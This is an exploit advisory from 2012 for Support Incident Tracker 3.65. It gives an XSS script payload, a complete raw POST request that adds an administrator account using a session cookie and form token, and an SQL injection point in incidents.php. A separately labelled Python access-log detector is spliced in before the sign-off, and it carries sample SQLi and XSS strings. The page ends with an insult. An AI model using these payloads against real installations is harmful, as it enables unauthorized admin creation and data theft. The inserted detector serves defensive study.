Support Incident Tracker Multiple Vulnerabilities



EKU-ID: 1892 CVE: OSVDB-ID:
Author: L3b-r1'z Published: 2012-04-11 Verified: Verified


#########
# Author : L3b-r1'z
# Title : Support Incident Tracker Multiple Vulnerabilities
# Email : L3br1z@gmail.com
# Site : Sec4Leb.Com
# Download : http://sourceforge.net/projects/sitracker/files/stable/3.65/sit_3.65.tar.gz/download
#########


  # # #           # # #     # #                                           # #                   
    #           #       #     #                                             #                   
    #                   #     #   # #                     # #   # #         #         # # # # # 
    #               # #       # #     #     # # # # #       # #             #         #     #   
    #     #             #     #       #                     #               #             #     
    #     #     #       #     #       #                     #               #           #     # 
  # # # # #       # # #     # # # # #                     # # # #       # # # # #     # # # # # 



XSS Vuln

[+] P0c :

Open the site and put your XSS test code (an alert) in the search box.

In view_task.php?id=1
submit your XSS code : <script>alert("1337day")</script>

Add Admin Vuln

[+] P0c :

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/sit-3.65/user_add.php?action=showform
Cookie: SiTsessionID=b0e72bd1560746bc60ceb71a3d836054
Content-Type: application/x-www-form-urlencoded
Content-Length: 243

realname=1337day&username=1337day&password=1337day&groupid=0&roleid=1&jobtitle=1337day&email=1337day@1337day.1337day&phone=1337day&mobile=1337day&fax=1337day&holiday_entitlement=21&startdate=&formtoken=7809f76811dc36c4920a4a4bac36d7627ff96072&submit=Add+User

You can send this POST request with a tool such as HackBar :D

SQL Injection :
http://localhost/sit-3.65/incidents.php?user=all&queue=1&type=support

http://localhost/sit-3.65/incidents.php?user=all&queue=[SQL]&type=support
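The three PoCs above (markup in a parameter, a POST to user_add.php, a non-numeric queue id on incidents.php) all leave traces in the web server's access log. The following is an added detection example written for this page; it is not part of the advisory and not code from the sitracker project. It parses Apache "combined" log lines and flags the three patterns. The log lines are constructed, the parameter name `search` and the expected site host `localhost` are assumptions, and only the script names and parameters shown on the page are treated as known.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache "combined" log lines modelled on the advisory's URLs.
# They are sample input for this example, not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Apr/2012:10:01:02 +0000] "GET /sit-3.65/incidents.php?user=all&queue=1&type=support HTTP/1.1" 200 5120 "http://localhost/sit-3.65/" "Mozilla/5.0"
10.0.0.9 - - [11/Apr/2012:10:01:07 +0000] "GET /sit-3.65/incidents.php?user=all&queue=1%27%20OR%201%3D1--&type=support HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Apr/2012:10:01:12 +0000] "GET /sit-3.65/view_task.php?id=1&search=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Apr/2012:10:01:20 +0000] "POST /sit-3.65/user_add.php HTTP/1.1" 302 0 "http://localhost/sit-3.65/user_add.php?action=showform" "Mozilla/5.0"
10.0.0.9 - - [11/Apr/2012:10:01:25 +0000] "POST /sit-3.65/user_add.php HTTP/1.1" 302 0 "http://third-party.example/lure.html" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameters the application only ever uses as integer ids (from the advisory's URLs).
INT_PARAMS = {"incidents.php": {"queue"}, "view_task.php": {"id"}}

# Markup indicators in a decoded parameter value: an HTML tag opener or a javascript: URL.
HTML_TAG_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)
JS_URL_RE = re.compile(r"javascript\s*:", re.I)


def parse_line(line):
    """Return a dict with the request fields, or None if the line is not combined-format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    req = m.groupdict()
    parts = urlsplit(req["target"])
    req["script"] = parts.path.rsplit("/", 1)[-1]          # e.g. "incidents.php"
    req["params"] = parse_qsl(parts.query, keep_blank_values=True)  # percent-decoded pairs
    return req


def check_request(req, site_host):
    """Apply the three rules to one parsed request; return a list of (rule, detail)."""
    findings = []
    script = req["script"]
    for name, value in req["params"]:
        # Rule 1: an id parameter that is not a plain integer is a SQL injection attempt indicator.
        if name in INT_PARAMS.get(script, ()) and not value.isdigit():
            findings.append(("sqli_suspect", f"{script} {name}={value!r} is not an integer"))
        # Rule 2: markup in any parameter value is a reflected-XSS probe indicator.
        if HTML_TAG_RE.search(value) or JS_URL_RE.search(value):
            findings.append(("xss_suspect", f"{script} {name}={value!r} contains markup"))
    # Rule 3: every POST to user_add.php creates an account and should be audited;
    # a Referer from another host is worth a second look.
    if req["method"] == "POST" and script == "user_add.php":
        findings.append(("account_create", "POST to user_add.php (new user created)"))
        ref_host = urlsplit(req["referer"]).hostname if req["referer"] != "-" else None
        if ref_host != site_host:
            findings.append(("cross_site_post", f"Referer host {ref_host!r} differs from {site_host!r}"))
    return findings


def scan_log(text, site_host="localhost"):
    """Scan a block of log text; return one dict per finding, in log order."""
    results = []
    for line in text.splitlines():
        req = parse_line(line)
        if req is None:
            continue
        for rule, detail in check_request(req, site_host):
            results.append({"ip": req["ip"], "ts": req["ts"], "rule": rule, "detail": detail})
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:<10} {f['rule']:<16} {f['detail']}")
```

The integer allow-list in rule 1 is the same check the application itself should apply to `queue` before it reaches a query; in the log it doubles as a high-signal detector, since a legitimate client never sends anything but digits there.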


./EOE

Note : Fuck To All the Lamer'z .